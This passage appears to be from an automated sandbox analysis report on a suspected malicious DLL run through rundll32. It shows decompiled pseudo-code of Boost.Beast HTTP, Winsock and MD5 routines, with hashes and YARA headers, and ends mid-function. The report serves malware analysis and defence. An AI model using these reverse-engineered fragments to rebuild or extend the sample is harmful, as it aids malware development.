                                        0x1c338813dcf
                                        0x1c338813dd4
                                        0x1c338813dd9
                                        0x1c338813de2
                                        0x1c338813de7
                                        0x1c338813def
                                        0x1c338813df4
                                        0x1c338813dfe
                                        0x1c338813e07
                                        0x1c338813e0c
                                        0x1c338813e11
                                        0x1c338813e1a
                                        0x1c338813e1f
                                        0x1c338813e22
                                        0x1c338813e25
                                        0x1c338813e2a
                                        0x1c338813e2d
                                        0x1c338813e37
                                        0x1c338813e3d
                                        0x1c338813e3f
                                        0x1c338813e48
                                        0x1c338813e4b
                                        0x1c338813e50
                                        0x1c338813e56
                                        0x1c338813e5c
                                        0x1c338813e5f
                                        0x1c338813e64
                                        0x1c338813e6b
                                        0x1c338813e70
                                        0x1c338813e75
                                        0x1c338813e7a
                                        0x1c338813e7f
                                        0x1c338813e85
                                        0x1c338813e89
                                        0x1c338813e8b
                                        0x1c338813e8f
                                        0x1c338813e91
                                        0x1c338813e95
                                        0x1c338813e97
                                        0x1c338813e9b
                                        0x1c338813e9d
                                        0x1c338813ea1
                                        0x1c338813ea3
                                        0x1c338813ea7
                                        0x1c338813eab
                                        0x1c338813eae
                                        0x1c338813eb1
                                        0x1c338813eb5
                                        0x1c338813eb7
                                        0x1c338813ebc
                                        0x1c338813ed0
                                        0x1c338813edd
                                        0x1c338813ef7
                                        0x1c338813ef9
                                        0x1c338813efc
                                        0x1c338813efe
                                        0x1c338813f05
                                        0x1c338813f0b
                                        0x1c338813f0e
                                        0x1c338813f15
                                        0x1c338813f1b
                                        0x1c338813f20
                                        0x1c338813f2d
                                        0x1c338813f50

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction ID: f17b141850934d5fa54123255d3a3ca6d39b10402c1222f8de5cc23c1a9a2d0b
                                        • Opcode Fuzzy Hash: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction Fuzzy Hash: 0E71B6721903D086F7688F28C044AAC3BB5F785F18F14B117DE668A699DF3ACB85C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33870BB60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C33870BB60(intOrPtr* __rcx, void* __rdx, void* __r8, void* __r10) {
				signed int _t22;
				intOrPtr* _t39;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t51;

				_t46 = __r8;
				_t22 =  *(__rcx + 0x10) & 0x000000ff;
				if (_t22 != 1) goto 0x3870bb86;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x48) goto 0x3870bc2c;
				goto E000001C31C33870EB20;
				if (_t22 != 2) goto 0x3870bba5;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x38) goto 0x3870bc2c;
				goto 0x3870fdc0;
				if (_t22 != 3) goto 0x3870bc27;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				_t51 =  *__rcx;
				if ( *((intOrPtr*)(__rcx + 8)) != _t51 + 0x28) goto 0x3870bc2c;
				_t43 =  *((intOrPtr*)(_t51 + 0x10));
				r10d = 0;
				_t39 =  *((intOrPtr*)(_t51 + 8));
				if (_t39 == _t43) goto 0x3870bc0a;
				_t14 = _t39 + 0x32; // 0xccccc35fe38b4928
				r8d =  *_t14 & 0x0000ffff;
				_t16 = _t46 + 2; // 0xccccc35fe38b492a
				if ( *_t39 != _t43) goto 0x3870bbd0;
				if (_t16 + __rdx + __r10 == 0) goto 0x3870bc0a;
				if ( *(__rcx + 0x10) == 0) goto 0x3870bc00;
				 *(__rcx + 0x10) = 0;
				 *((long long*)(__rcx + 8)) =  *((intOrPtr*)(_t51 + 8));
				 *(__rcx + 0x10) = 4;
				return _t22;
			}








                                        0x1c33870bb60
                                        0x1c33870bb60
                                        0x1c33870bb69
                                        0x1c33870bb6b
                                        0x1c33870bb7b
                                        0x1c33870bb81
                                        0x1c33870bb88
                                        0x1c33870bb8a
                                        0x1c33870bb9a
                                        0x1c33870bba0
                                        0x1c33870bba7
                                        0x1c33870bbad
                                        0x1c33870bbb2
                                        0x1c33870bbbd
                                        0x1c33870bbbf
                                        0x1c33870bbc3
                                        0x1c33870bbc6
                                        0x1c33870bbcd
                                        0x1c33870bbd0
                                        0x1c33870bbd0
                                        0x1c33870bbdf
                                        0x1c33870bbe9
                                        0x1c33870bbee
                                        0x1c33870bbf9
                                        0x1c33870bbfb
                                        0x1c33870bc00
                                        0x1c33870bc04
                                        0x1c33870bc09

                                        Strings
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun, xrefs: 000001C338711F3F
                                        • invalid iterator, xrefs: 000001C338711F0C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun
                                        • API String ID: 0-301515690
                                        • Opcode ID: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction ID: 06b658013764d6cb096ff616e8940dc30f1b66c5478c2a033f850f9024073f2b
                                        • Opcode Fuzzy Hash: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction Fuzzy Hash: C371CE73146BD496FB918B18D048B993BE1F305B49FA4E916C66C463A0DB7DC786C343
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33882846C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C33882846C(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t11;
				void* _t13;
				intOrPtr* _t21;
				intOrPtr* _t35;

				_t21 = _t35;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rbp;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				r15b = r9b;
				_t10 =  >  ? __ebx : 0;
				_t11 = ( >  ? __ebx : 0) + 9;
				if (__rdx - _t21 > 0) goto 0x388284d1;
				_t13 = E000001C31C338818984(_t21);
				 *_t21 = 0x22;
				E000001C31C338811BC8(_t13);
				return 0x22;
			}







                                        0x1c33882846c
                                        0x1c33882846f
                                        0x1c338828473
                                        0x1c338828477
                                        0x1c33882847b
                                        0x1c33882848d
                                        0x1c338828496
                                        0x1c338828499
                                        0x1c3388284a1
                                        0x1c3388284a3
                                        0x1c3388284ad
                                        0x1c3388284af
                                        0x1c3388284d0

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: e+000$gfff
                                        • API String ID: 3215553584-3030954782
                                        • Opcode ID: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction ID: 03f72d251336008955dbbd47696b7b7380cd17f47d5396eeb6be1960a89e5176
                                        • Opcode Fuzzy Hash: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction Fuzzy Hash: 6A5105727547C086FB258F39E94179DAB91F341B90F08E626CAB84BBD6CA2CC544C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33870BC30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E000001C31C33870BC30(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				long long _v56;
				void* __rdi;
				intOrPtr* _t105;
				long long _t117;
				intOrPtr _t123;
				long long _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;

				_t105 = __rax;
				_a16 = __rdx;
				_v56 = 0xfffffffe;
				_a8 = __rbx;
				_a24 = __rsi;
				_t134 = __rcx;
				if (( *(__rcx + 0x20) & 0x000000ff) != 1) goto 0x3870bd61;
				_t129 =  *__rcx + 0x10;
				E000001C31C338708C60( &_v32,  *__rcx + 0x10);
				_t132 = _t105;
				_t117 = _t134 + 8;
				E000001C31C33870BB60(_t117, _t129, __r8, __r10);
				if ( *_t117 ==  *_t132) goto 0x3870bc88;
				goto 0x3870bcf0;
				if (0 ==  *((intOrPtr*)(_t132 + 0x10))) goto 0x3870bc95;
				goto 0x3870bcf0;
				if (0 == 0) goto 0x3870bcee;
				if (0 != 1) goto 0x3870bcaa;
				goto 0x3870bcf0;
				if (0 != 2) goto 0x3870bcbb;
				goto 0x3870bcf0;
				if (0 != 3) goto 0x3870bccc;
				goto 0x3870bcf0;
				if (0 != 4) goto 0x3870bcdd;
				goto 0x3870bcf0;
				if (0 != 5) goto 0x3870bcee;
				goto 0x3870bcf0;
				_v16 = 0;
				if (1 == 0) goto 0x3870bdff;
				_t123 =  *_t134;
				asm("movups xmm1, [ecx]");
				asm("psrldq xmm1, 0x8");
				asm("dec ax");
				if ( *((intOrPtr*)(_t132 + 8)) == 0) goto 0x3870bd3d;
				if (1 == 0) goto 0x3870bd31;
				if (1 != 1) goto 0x3870bd2d;
				_a16 = _t117;
				if ( *((char*)(_t117 + 0x10)) == 0) goto 0x3870bd2d;
				 *((char*)(_t117 + 0x10)) = 0;
				 *((char*)(_t117 + 0x18)) = 0;
				 *_t117 = _t123;
				 *((char*)(_t117 + 0x18)) = 2;
				goto 0x3870bdff;
				if (1 == 0) goto 0x3870bd58;
				if (1 != 1) goto 0x3870bd54;
				_a16 = _t117;
				if ( *((char*)(_t117 + 0x10)) == 0) goto 0x3870bd54;
				 *((char*)(_t117 + 0x10)) = 0;
				 *((char*)(_t117 + 0x18)) = 0;
				 *((char*)(_t117 + 0x18)) = 3;
				goto 0x3870bdff;
				if (1 != 2) goto 0x3870bda2;
				_t124 = _t123 + 8;
				 *_t124 =  *_t124 + 0x10;
				if ( *_t124 !=  *_t134 + 0x10) goto 0x3870bdff;
				if (1 == 0) goto 0x3870bd9c;
				if (( *(_t124 + 0x18) & 0x000000ff) != 1) goto 0x3870bd98;
				_a16 = _t124;
				if ( *((char*)(_t124 + 0x10)) == 0) goto 0x3870bd98;
				 *((char*)(_t124 + 0x10)) = 0;
				 *(_t124 + 0x18) = 0;
				 *(_t124 + 0x18) = 3;
				goto 0x3870bdff;
				_v32 = 0x3889d200;
				_v24 = 0x3889d200;
				_v16 = 0x3889d200;
				_v48 = "invalid iterator";
				_v40 = 1;
				E000001C31C33880E0E4(_t117,  &_v48,  &_v24, _t132, _t134);
				_v32 = 0x3889d240;
				r9d = 0xd9;
				return E000001C31C338710190(0x3889d240, _t117,  &_v32, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::asio::const_buffer>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,2> &)", _t132);
			}
















                                        0x1c33870bc30
                                        0x1c33870bc30
                                        0x1c33870bc3a
                                        0x1c33870bc43
                                        0x1c33870bc48
                                        0x1c33870bc4d
                                        0x1c33870bc56
                                        0x1c33870bc5f
                                        0x1c33870bc68
                                        0x1c33870bc6d
                                        0x1c33870bc70
                                        0x1c33870bc77
                                        0x1c33870bc82
                                        0x1c33870bc86
                                        0x1c33870bc8f
                                        0x1c33870bc93
                                        0x1c33870bc97
                                        0x1c33870bc9b
                                        0x1c33870bca8
                                        0x1c33870bcac
                                        0x1c33870bcb9
                                        0x1c33870bcbd
                                        0x1c33870bcca
                                        0x1c33870bcce
                                        0x1c33870bcdb
                                        0x1c33870bcdf
                                        0x1c33870bcec
                                        0x1c33870bcf0
                                        0x1c33870bcf7
                                        0x1c33870bcfd
                                        0x1c33870bd00
                                        0x1c33870bd03
                                        0x1c33870bd08
                                        0x1c33870bd14
                                        0x1c33870bd18
                                        0x1c33870bd1c
                                        0x1c33870bd1e
                                        0x1c33870bd27
                                        0x1c33870bd29
                                        0x1c33870bd2d
                                        0x1c33870bd31
                                        0x1c33870bd34
                                        0x1c33870bd38
                                        0x1c33870bd3f
                                        0x1c33870bd43
                                        0x1c33870bd45
                                        0x1c33870bd4e
                                        0x1c33870bd50
                                        0x1c33870bd54
                                        0x1c33870bd58
                                        0x1c33870bd5c
                                        0x1c33870bd63
                                        0x1c33870bd65
                                        0x1c33870bd69
                                        0x1c33870bd77
                                        0x1c33870bd83
                                        0x1c33870bd87
                                        0x1c33870bd89
                                        0x1c33870bd92
                                        0x1c33870bd94
                                        0x1c33870bd98
                                        0x1c33870bd9c
                                        0x1c33870bda0
                                        0x1c33870bda9
                                        0x1c33870bdb0
                                        0x1c33870bdb5
                                        0x1c33870bdc1
                                        0x1c33870bdc6
                                        0x1c33870bdd5
                                        0x1c33870bde2
                                        0x1c33870bde7
                                        0x1c33870be0e

                                        APIs
                                        Strings
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 000001C33870BDED
                                        • invalid iterator, xrefs: 000001C33870BDBA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 592178966-3009069526
                                        • Opcode ID: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction ID: a156f6157f0ac326bd6bc2d13793457989e3824d33c784b12fbe8d4c61aceb52
                                        • Opcode Fuzzy Hash: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction Fuzzy Hash: 2351B272048BC881FB218F29D05C7AA67A2F711B4CF58A553D6A90779ACB3DC792C343
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33870BEF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E000001C31C33870BEF0(intOrPtr* __rcx) {
				signed int _t10;
				void* _t16;
				intOrPtr _t18;

				_t10 =  *(__rcx + 0x10) & 0x000000ff;
				if (_t10 != 1) goto 0x3870bf3c;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				_t18 =  *__rcx;
				_t16 =  *((intOrPtr*)(_t18 + 0x30)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) != _t16) goto 0x3870bfcd;
				asm("movups xmm1, [edx+0x20]");
				asm("psrldq xmm1, 0x8");
				asm("dec ax");
				if (_t16 == 0) goto 0x3870bf52;
				if ( *(__rcx + 0x10) == 0) goto 0x3870bf33;
				 *(__rcx + 0x10) = 0;
				 *((long long*)(__rcx + 8)) = _t18 + 0x20;
				 *(__rcx + 0x10) = 2;
				return _t10;
			}






                                        0x1c33870bef0
                                        0x1c33870bef6
                                        0x1c33870bef8
                                        0x1c33870befd
                                        0x1c33870bf04
                                        0x1c33870bf0c
                                        0x1c33870bf12
                                        0x1c33870bf1a
                                        0x1c33870bf1f
                                        0x1c33870bf27
                                        0x1c33870bf2d
                                        0x1c33870bf2f
                                        0x1c33870bf33
                                        0x1c33870bf37
                                        0x1c33870bf3b

                                        APIs
                                        Strings
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con, xrefs: 000001C33871211A
                                        • invalid iterator, xrefs: 000001C3387120E7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con
                                        • API String ID: 1552479455-1729322650
                                        • Opcode ID: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction ID: 2accb268655ad08b222882c2dc5256dfaf90267492869c83e940920f6650a99b
                                        • Opcode Fuzzy Hash: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction Fuzzy Hash: AC519CB2146BC485FB25C72CD4487C86BA1F715B0CFB8D616D2AC463A1EB6AC787C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3388205A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 52%
                                        			E000001C31C3388205A8(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, void* __r14, void* _a8, long long _a16, long long _a24) {
				long long _v0;
				long long _v40;
				void* __rdi;
				void* _t13;
				void* _t16;
				void* _t19;
				intOrPtr* _t27;
				struct _IO_FILE* _t29;
				long long _t40;
				void* _t42;
				void* _t44;
				long long _t49;
				void* _t55;
				long long _t60;

				_t60 = __r8;
				_t21 = __edx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t19 = r8d;
				_t13 = E000001C31C33882C4B0(3, __edx, __rax);
				if (_t13 == 1) goto 0x3882060c;
				if (_t13 != 0) goto 0x388205e7;
				if (E000001C31C33882C360() == 1) goto 0x3882061b;
				r8d = _t19;
				_t29 = _a8;
				_t49 = _a24;
				_t44 = _t42;
				goto 0x3881fb98;
				r8d = _t19;
				E000001C31C338820430(_t29, _t49, _t44, _t44, _t49, __r14);
				asm("int3");
				r8d = _t19;
				_t40 = _t44;
				_t35 = _t49;
				_t16 = E000001C31C338820430(_t29, _t49, _t40, _t44, _t49, __r14);
				asm("int3");
				asm("int3");
				asm("int3");
				_t27 = _t55 - 0x20 + 0x20;
				 *((long long*)(_t27 + 0x10)) = _t40;
				 *((long long*)(_t27 + 0x18)) = _t60;
				 *((long long*)(_t27 + 0x20)) = _v0;
				_push(_t29);
				_push(_t49);
				_push(_t44);
				E000001C31C33871E120(_t16);
				r9d = 0;
				_v40 = _t27 + 0x18;
				return E000001C31C338816A00(_t21, _t35,  *_t27, _t35, _t40, _v0);
			}

















                                        0x1c3388205a8
                                        0x1c3388205a8
                                        0x1c3388205a8
                                        0x1c3388205ad
                                        0x1c3388205b2
                                        0x1c3388205c9
                                        0x1c3388205cf
                                        0x1c3388205d7
                                        0x1c3388205db
                                        0x1c3388205e5
                                        0x1c3388205ea
                                        0x1c3388205f3
                                        0x1c3388205fd
                                        0x1c338820606
                                        0x1c338820607
                                        0x1c33882060c
                                        0x1c338820615
                                        0x1c33882061a
                                        0x1c33882061b
                                        0x1c33882061e
                                        0x1c338820621
                                        0x1c338820624
                                        0x1c338820629
                                        0x1c33882062a
                                        0x1c33882062b
                                        0x1c33882062c
                                        0x1c33882062f
                                        0x1c338820633
                                        0x1c338820637
                                        0x1c33882063b
                                        0x1c33882063c
                                        0x1c33882063d
                                        0x1c33882064c
                                        0x1c338820651
                                        0x1c338820654
                                        0x1c33882066e

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_error_mode
                                        • String ID: Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1949149715-326578492
                                        • Opcode ID: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction ID: 05957a3b3597166714ebe9cbbb48f48348c9ed2c965853134ffd0ddfeed6fb74
                                        • Opcode Fuzzy Hash: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction Fuzzy Hash: F11134B175079081F6249B03E9419AEE755FB84FC0F64E423EF580BF96CE38C6518741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386EFE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E000001C31C3386EFE70(signed int __esi, long long __rax, long long __rbx, long long __rcx, void* __rdx, void* __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
				char _v424;
				long long _v440;
				char _v456;
				long long _v464;
				char _v472;
				void* _t24;
				void* _t25;
				long long _t34;
				long long _t49;
				void* _t55;
				void* _t57;

				_t39 = __rcx;
				_t36 = __rbx;
				_t34 = __rax;
				_a8 = __rcx;
				_v440 = 0xfffffffe;
				_a32 = __rbx;
				_t49 = __rcx;
				E000001C31C3386EED10(__rax, __rbx, __rcx, __rsi);
				asm("lock xadd [0x21b78c], eax");
				if (1 != 1) goto 0x386efebf;
				__imp__#115();
				 *0x3890b634 = 2;
				asm("lock xadd [0x21b76b], ebx");
				if (0 == 0) goto 0x386efeed;
				E000001C31C33880D880(_t39,  &_v424);
				_v472 = 0;
				_v464 = _t34;
				E000001C31C3386EE680("winsock");
				E000001C31C33880B674(_t34,  &_v472);
				_a24 = _t34;
				r8d = r8d | 0xffffffff;
				_t24 = E000001C31C3386EF1F0(__esi, _t36, _t34, _t49, __rbp);
				_a16 = _t34;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x30], xmm0");
				_t25 = E000001C31C3387012B0(_t24,  &_v456, _t49, _t55, _t57);
				E000001C31C3386EEB30();
				_a16 = 0;
				 *((long long*)(_t49 + 0x10)) = _t34;
				return _t25;
			}














                                        0x1c3386efe70
                                        0x1c3386efe70
                                        0x1c3386efe70
                                        0x1c3386efe70
                                        0x1c3386efe7d
                                        0x1c3386efe86
                                        0x1c3386efe8e
                                        0x1c3386efe91
                                        0x1c3386efe9c
                                        0x1c3386efea9
                                        0x1c3386efeb3
                                        0x1c3386efeb9
                                        0x1c3386efec1
                                        0x1c3386efecb
                                        0x1c3386efecd
                                        0x1c3386efed2
                                        0x1c3386efed6
                                        0x1c3386efee7
                                        0x1c3386efef2
                                        0x1c3386efef7
                                        0x1c3386efeff
                                        0x1c3386eff09
                                        0x1c3386eff11
                                        0x1c3386eff19
                                        0x1c3386eff1c
                                        0x1c3386eff29
                                        0x1c3386eff39
                                        0x1c3386eff3e
                                        0x1c3386eff4a
                                        0x1c3386eff61

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction ID: ecd4db2a630da570fed824ebd2e34cfddc76fbc5f9cfdbfbcc700dddcd334ca4
                                        • Opcode Fuzzy Hash: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction Fuzzy Hash: A721B6326807C042F7209B54F5847DAB361FB857A4F10A326A7B5476AADF7CD2448B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386EFF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E000001C31C3386EFF70(signed int __esi, long long __rax, long long __rbx, long long __rcx, void* __rdx, void* __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
				char _v424;
				long long _v440;
				char _v456;
				long long _v464;
				char _v472;
				void* _t24;
				void* _t25;
				long long _t34;
				long long _t49;
				void* _t55;
				void* _t57;

				_t39 = __rcx;
				_t36 = __rbx;
				_t34 = __rax;
				_a8 = __rcx;
				_v440 = 0xfffffffe;
				_a16 = __rbx;
				_t49 = __rcx;
				E000001C31C3386EED10(__rax, __rbx, __rcx, __rsi);
				asm("lock xadd [0x21b68c], eax");
				if (1 != 1) goto 0x386effbf;
				__imp__#115();
				 *0x3890b634 = 2;
				asm("lock xadd [0x21b66b], ebx");
				if (0 == 0) goto 0x386effed;
				E000001C31C33880D880(_t39,  &_v424);
				_v472 = 0;
				_v464 = _t34;
				E000001C31C3386EE680("winsock");
				E000001C31C33880B674(_t34,  &_v472);
				_a32 = _t34;
				r8d = r8d | 0xffffffff;
				_t24 = E000001C31C3386EF1F0(__esi, _t36, _t34, _t49, __rbp);
				_a24 = _t34;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x30], xmm0");
				_t25 = E000001C31C3387012B0(_t24,  &_v456, _t49, _t55, _t57);
				E000001C31C3386EEB30();
				_a24 = 0;
				 *((long long*)(_t49 + 0x10)) = _t34;
				return _t25;
			}














                                        0x1c3386eff70
                                        0x1c3386eff70
                                        0x1c3386eff70
                                        0x1c3386eff70
                                        0x1c3386eff7d
                                        0x1c3386eff86
                                        0x1c3386eff8e
                                        0x1c3386eff91
                                        0x1c3386eff9c
                                        0x1c3386effa9
                                        0x1c3386effb3
                                        0x1c3386effb9
                                        0x1c3386effc1
                                        0x1c3386effcb
                                        0x1c3386effcd
                                        0x1c3386effd2
                                        0x1c3386effd6
                                        0x1c3386effe7
                                        0x1c3386efff2
                                        0x1c3386efff7
                                        0x1c3386effff
                                        0x1c3386f0009
                                        0x1c3386f0011
                                        0x1c3386f0019
                                        0x1c3386f001c
                                        0x1c3386f0029
                                        0x1c3386f0039
                                        0x1c3386f003e
                                        0x1c3386f004a
                                        0x1c3386f0061

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction ID: 2d13ba878124f1d0bd8dc828b5f798a009b780a2978b29102537ff108b19be82
                                        • Opcode Fuzzy Hash: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction Fuzzy Hash: 7A21C5326807C083F7209F58E5847DAB361FB857A4F10A326A7B9476EADF7CC2448B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386F00B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E000001C31C3386F00B0(long long __rax, long long __rbx, void* __rcx) {
				long long _v8;
				long long _v16;
				long _v24;
				long _t14;
				void* _t15;
				long long _t23;
				intOrPtr _t27;
				void* _t29;

				_t23 = __rax;
